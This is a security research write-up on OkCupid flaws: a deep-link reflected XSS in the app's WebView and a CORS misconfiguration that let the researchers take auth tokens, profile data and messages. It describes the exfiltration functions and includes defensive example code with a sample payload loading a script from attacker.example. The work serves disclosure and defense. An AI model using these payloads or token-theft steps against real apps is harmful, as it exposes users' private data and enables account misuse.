Sensitive Data Exposure & Performing Actions on Behalf of the Victim

At this point, we were able to launch the OkCupid mobile application using a deep link that carries malicious JavaScript code in the section parameter. The following screenshot shows the final XSS payload, which loads jQuery and then loads further JavaScript code from the attacker's server (the upper part contains the XSS payload, the lower part is the same payload URL-encoded):

The following screenshot shows an HTTP GET request containing the final XSS payload in the section parameter:

The server reflects the payload sent in the section parameter back into the response, and the injected JavaScript code is executed in the context of the WebView.
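To make the reflection concrete, here is an added example (not OkCupid's code, and not the payload used in the research) of how a deep-link parameter that is pasted unencoded into the page a WebView loads becomes reflected XSS, next to the output encoding that neutralises it. The route, page template, placeholder hostnames and the sample payload are all assumptions made for the example.

```javascript
// Added example, not code from the original post. Shows why reflecting the
// `section` query parameter verbatim lets a URL-encoded deep link execute
// script in the WebView, and how entity-encoding the value prevents it.

// Minimal HTML entity encoding for text placed inside an element body.
// '&' is replaced first so that later entities are not double-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Extract the `section` parameter from the URL the WebView was asked to load.
// URLSearchParams percent-decodes it, which is why a URL-encoded payload in
// the deep link arrives at the server as plain HTML/JavaScript.
function sectionFromUrl(url) {
  return new URL(url).searchParams.get("section") || "";
}

// VULNERABLE: the parameter is concatenated into the page unchanged, so any
// markup in it is parsed, and any <script> in it executed, by the WebView.
function renderVulnerable(url) {
  const section = sectionFromUrl(url);
  return `<html><body><h1>Section: ${section}</h1></body></html>`;
}

// HARDENED: the same value is entity-encoded before insertion, so the WebView
// displays it as text instead of interpreting it as markup.
function renderHardened(url) {
  const section = sectionFromUrl(url);
  return `<html><body><h1>Section: ${escapeHtml(section)}</h1></body></html>`;
}

// Does the rendered HTML contain a live <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample: a deep link whose section parameter carries a
// URL-encoded script tag that pulls a file from a placeholder attacker host,
// mirroring the two-stage "load a remote script" shape described above.
const PAYLOAD = '<script src="https://attacker.example/x.js"></script>';
const DEEP_LINK =
  "https://app.example/page?section=" + encodeURIComponent(PAYLOAD);
```

Output encoding fixes the reflection itself; separately, a Content-Security-Policy on the WebView page that limits script-src to the application's own hosts would have blocked the payload's second stage, the jQuery and exfiltration scripts fetched from the attacker's server, even if the reflection remained.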

As mentioned before, the final XSS payload loads a script file from the attacker's server. The loaded JavaScript code, which carries out the exfiltration, contains three functions:

  1. steal_token – steals the user's authentication token, oauthAccessToken, and the user's id, userid. The user's sensitive information (PII), such as the email address, is exfiltrated as well.
  2. steal_data – steals the user's profile and private data: preferences, user characteristics (e.g. answers filled in during registration), and more.
  3. Send_data_to_attacker – sends the data collected by functions 1 and 2 to the attacker's server.

steal_token function:

The function issues an API call to the server. The user's cookies are sent along with the request, since the XSS payload is executed in the context of the application's WebView.

The server responds with a vast JSON document containing the user's id as well as the authentication token:

steal_data function:

The function issues an HTTP request to the API endpoint.

Using the data exfiltrated by the steal_token function, the request is sent with the authentication token and the user's id.

The server responds with the victim's profile information, including email address, sexual orientation, height, family status, etc.

Send_data_to_attacker function:

The function issues a POST request to the attacker's server containing all the data retrieved by the previous function calls (steal_token and steal_data).

The following screenshot shows an HTTP POST request sent to the attacker's server. The request body contains all of the victim's sensitive data:

Performing actions on behalf of the victim is also possible, thanks to the exfiltration of the victim's authentication token and user id. This information can be used from the malicious JavaScript code in the same way it is used in the steal_data function.

An attacker can perform actions such as sending messages and changing profile data using the data exfiltrated by the steal_token function:

  1. The authentication token, oauthAccessToken, is used in the Authorization header as the Bearer value.
  2. The user id, userId, is added wherever the endpoint requires it.

Note: an attacker cannot perform a full account takeover, since the session cookies are flagged HttpOnly and cannot be read by the injected script; the attacker is limited to what the exfiltrated oauthAccessToken and userId allow.


Web Platform Vulnerabilities

Mis-configured Cross-Origin Resource Sharing Policy Leads to Sensitive Data Exposure

During the course of the research, we found that the CORS policy of the API server api.OkCupid.com is not configured properly: any origin can send requests to the server and read its responses. The following screenshot shows a request sent to the API server from a foreign origin (our own domain):

The server does not validate the origin properly and responds with the requested data. Furthermore, the server response contains an Access-Control-Allow-Origin header echoing the requesting origin together with Access-Control-Allow-Credentials: true:

From this point on, we realized that we could send requests to the API server from our domain without being blocked by the CORS policy.

Once a victim is authenticated to the OkCupid application and browses to the attacker's web application, an HTTP GET request carrying the victim's cookies is sent to the API server. The server's response is a vast JSON document containing the victim's authentication token and the victim's user_id.
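The misconfiguration described above comes down to a few lines of server-side header logic. The following is an added example, not OkCupid's code, contrasting a CORS handler that echoes whatever Origin the browser sends (the pattern that lets any site read a cookie-authenticated API response) with an allowlist that does not, plus the check a browser applies before exposing a credentialed response to script. The allowlist entries, the attacker hostname and the endpoint in the comment are assumptions.

```javascript
// Added example, not code from the original post. Reflecting the request's
// Origin with Allow-Credentials: true is what turns an authenticated API into
// one readable from any page; an exact-match allowlist closes it.

// Assumed set of first-party origins allowed to make credentialed calls.
const ALLOWED_ORIGINS = new Set([
  "https://www.example-app.test",
  "https://m.example-app.test",
]);

// VULNERABLE: whatever Origin the browser sends is echoed back, together
// with Allow-Credentials: true. Browsers reject "*" when credentials are
// involved, but an exact echo passes the check, so the attacker's page can
// read the body of a response authenticated by the victim's cookies.
function corsHeadersVulnerable(origin) {
  if (!origin) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// HARDENED: only an exact, pre-approved origin is echoed; any other origin
// gets no CORS headers, so the browser withholds the response from the page.
// Vary: Origin stops a shared cache from replaying one origin's grant to
// another.
function corsHeadersHardened(origin) {
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// The check a browser applies before exposing a credentialed response to
// script: Allow-Origin must equal the requesting origin exactly (never "*")
// and Allow-Credentials must be "true". Returns true if the page can read it.
function browserWouldExposeResponse(requestOrigin, responseHeaders) {
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  const acac = responseHeaders["Access-Control-Allow-Credentials"];
  return acao === requestOrigin && acac === "true";
}

// Run one credentialed cross-origin request through a header policy and
// report whether a page on `requestOrigin` could read the body.
function simulate(policy, requestOrigin) {
  return browserWouldExposeResponse(requestOrigin, policy(requestOrigin));
}

// For reference, the attacker page side (runs in a browser, not here; the
// endpoint and field names are placeholders):
//   fetch("https://api.example-app.test/bootstrap", { credentials: "include" })
//     .then(r => r.json())
//     .then(j => { /* j.access_token and j.user_id are now readable */ });
```

The allowlist compares whole origins with Set.has. Prefix, suffix or regex matches (for example accepting anything that ends in the company domain, or that starts with the company's scheme and host) are the usual way a "fixed" policy is re-broken, because an attacker-registered hostname can be made to satisfy them.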

The bootstrap API endpoint turned out to hold many more useful details, among them further sensitive API endpoints on the API server:

The following screenshot shows exfiltration of sensitive PII data from the /profile/ API endpoint, using the victim's user_id and access_token:

The following screenshot shows exfiltration of the victim's messages from the /1/messages/ API endpoint, using the victim's user_id and access_token:

Summary

The world of online-dating apps has developed rapidly over the years, and has matured to where it is today with the shift to a digital world, especially in the last six months, since the outbreak of Coronavirus around the world. "New normal" habits such as social distancing have pushed the dating world to rely entirely on digital tools.

The research presented here shows the risks associated with one of the longest-established and most popular apps in its sector. The dire need for privacy and data security becomes even more essential when so much private and intimate information is stored, handled and analyzed in a single application. The app and platform were built to bring people together, but of course where people go, criminals will follow, looking for easy pickings.
